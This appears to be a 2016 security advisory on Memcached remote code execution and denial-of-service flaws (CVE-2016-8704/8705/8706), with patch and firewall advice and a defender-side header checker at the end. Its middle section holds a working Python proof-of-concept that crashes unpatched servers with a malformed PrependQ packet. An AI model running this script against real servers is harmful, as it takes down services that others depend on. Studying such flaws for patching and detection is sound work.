Memcached fixes multiple high-risk vulnerabilities that can lead to code execution and denial of service - vulnerability warning - Black Bar Safety Net (myhack58)

2016-11-02T00:00:00
ID MYHACK58:62201680790
Type myhack58
Reporter Anonymous
Modified 2016-11-02T00:00:00

Description

Background description

Memcached is a free, open-source, high-performance, distributed memory object caching system. It was originally developed under the lead of Brad Fitzpatrick at Danga Interactive, the company behind LiveJournal, and has since become an important component in scaling the web applications of MySpace, Hatena, Facebook, Vox, LiveJournal and many other services. Memcached is an in-memory key-value store for small chunks of arbitrary data (strings, objects), such as the results of database calls, API calls or page rendering. Essentially it is a simple key-value storage system; its usual purpose is to cache database query results so that fewer database accesses are needed, which makes dynamic web applications faster and more scalable.

Vulnerability description

On 31 October 2016 Memcached released security patches that fix multiple remote code execution vulnerabilities. By exploiting them an attacker can steal the business data stored in Memcached, or crash the Memcached service and cause a denial of service, among other harms. Anquanke reminds users to upgrade promptly to the official 1.4.33 release.

Memcached contains multiple integer overflow vulnerabilities that can lead to remote code execution. They are located in the functions that insert, append, prepend and update key-value pairs, and the SASL authentication code is affected as well. An attacker can exploit them by sending a carefully constructed Memcached command to the server. These flaws can also leak sensitive process information, and because they can be triggered repeatedly, the leaked information lets an attacker bypass ASLR and other common exploit mitigations. The ability to bypass these mitigations is what makes the vulnerabilities particularly serious.

Although the Memcached documentation strongly recommends running the service only in a trusted network environment, a large number of Memcached services are still directly reachable from the public Internet. Even where Memcached is deployed on an internal network, enterprise security managers cannot ignore this security update: attackers can reach services inside the network through network penetration, SSRF vulnerabilities and similar routes.

Vulnerability numbers

CVE-2016-8704 - Memcached Append/Prepend remote code execution vulnerability
CVE-2016-8705 - Memcached Update remote code execution vulnerability
CVE-2016-8706 - Memcached SASL authentication remote code execution vulnerability

Exploit code (PoC)

The code below (Python 2) crashes the service and causes a denial of service; please do not try it casually.

    import struct
    import socket
    import sys

    # Binary protocol request header fields (network byte order)
    MEMCACHED_REQUEST_MAGIC = "\x80"
    OPCODE_PREPEND_Q = "\x1a"
    key_len = struct.pack("!H", 0xfa)   # key length larger than the declared body
    extra_len = "\x00"
    data_type = "\x00"
    vbucket = "\x00\x00"
    body_len = struct.pack("!I", 0)     # body length declared as zero
    opaque = struct.pack("!I", 0)
    CAS = struct.pack("!Q", 0)
    body = "A" * 1024

    # host and port are taken from argv[1] and argv[2]
    if len(sys.argv) != 3:
        print "./poc_crash.py "
        sys.exit(1)

    packet = MEMCACHED_REQUEST_MAGIC + OPCODE_PREPEND_Q + key_len + extra_len
    packet += data_type + vbucket + body_len + opaque + CAS
    packet += body

    # ASCII protocol commands used before and after the malformed request
    set_packet = "set testkey 0 60 4\r\ntest\r\n"
    get_packet = "get testkey\r\n"

    # 1. store a 4-byte value under "testkey"
    s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s1.connect((sys.argv[1], int(sys.argv[2])))
    s1.sendall(set_packet)
    print s1.recv(1024)
    s1.close()

    # 2. send the malformed binary PrependQ request
    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s2.connect((sys.argv[1], int(sys.argv[2])))
    s2.sendall(packet)
    print s2.recv(1024)
    s2.close()

    # 3. read the key back; a vulnerable server no longer answers
    s3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s3.connect((sys.argv[1], int(sys.argv[2])))
    s3.sendall(get_packet)
    s3.recv(1024)
    s3.close()

Test results: (screenshot not reproduced)

Domestic impact statistics (data from fofa.so): (chart not reproduced)

Vulnerability details

Technical details and analysis:
http://www.talosintelligence.com/reports/TALOS-2016-0219/
http://www.talosintelligence.com/reports/TALOS-2016-0220/
http://www.talosintelligence.com/reports/TALOS-2016-0221/

Solutions

1. Upgrade to the latest official version, 1.4.33: http://www.memcached.org/files/memcached-1.4.33.tar.gz
2. Restrict access to Memcached port 11211, e.g. block access from the external network and allow only the specific access that is required.
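As an added defender-side example (not code from the advisory or from the Memcached project), the following Python 3 snippet parses a Memcached binary-protocol request header and flags the inconsistency the PoC relies on: a key_len that exceeds the declared body_len, and a body longer than the header promises. The header layout follows the public binary protocol; the sample frames and the build_request helper are constructed here for testing.

```python
import struct

# Memcached binary protocol request header: 24 bytes, network byte order.
# Fields: magic, opcode, key_len, extra_len, data_type, vbucket, body_len, opaque, cas
HEADER_FMT = "!BBHBBHIIQ"
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 24
REQUEST_MAGIC = 0x80
OPCODE_PREPEND_Q = 0x1a  # the opcode the advisory's PoC sends


def check_request(frame):
    """Return the list of length inconsistencies in one binary request frame.
    An empty list means the header agrees with itself and with the bytes present."""
    if len(frame) < HEADER_LEN:
        return ["short header: %d bytes" % len(frame)]
    (magic, _opcode, key_len, extra_len, _data_type, _vbucket,
     body_len, _opaque, _cas) = struct.unpack(HEADER_FMT, frame[:HEADER_LEN])
    problems = []
    if magic != REQUEST_MAGIC:
        problems.append("bad request magic 0x%02x" % magic)
    # body_len covers extras + key + value, so extras and key can never exceed it;
    # when they do, value_len = body_len - key_len - extra_len goes negative.
    if key_len + extra_len > body_len:
        problems.append("key_len %d + extra_len %d exceeds body_len %d"
                        % (key_len, extra_len, body_len))
    on_wire = len(frame) - HEADER_LEN
    if on_wire != body_len:
        problems.append("header promises %d body bytes, %d on the wire"
                        % (body_len, on_wire))
    return problems


def build_request(opcode, key, value, key_len=None, body_len=None):
    """Assemble a request with no extras (constructed helper); key_len/body_len
    may be overridden so a malformed header like the PoC's can serve as test input."""
    key_len = len(key) if key_len is None else key_len
    body_len = len(key) + len(value) if body_len is None else body_len
    header = struct.pack(HEADER_FMT, REQUEST_MAGIC, opcode, key_len, 0, 0, 0,
                         body_len, 0, 0)
    return header + key + value


# Constructed samples: the PoC's header (key_len 0xfa, body_len 0, then 1024
# body bytes) and a well-formed PrependQ of "test" onto key "testkey".
POC_FRAME = build_request(OPCODE_PREPEND_Q, b"", b"A" * 1024, key_len=0xfa, body_len=0)
GOOD_FRAME = build_request(OPCODE_PREPEND_Q, b"testkey", b"test")

if __name__ == "__main__":
    print("PoC frame:", check_request(POC_FRAME) or "ok")
    print("good frame:", check_request(GOOD_FRAME) or "ok")
```

The same check can run in a proxy or IDS in front of port 11211; a frame that fails it should be dropped and logged rather than forwarded to an unpatched server.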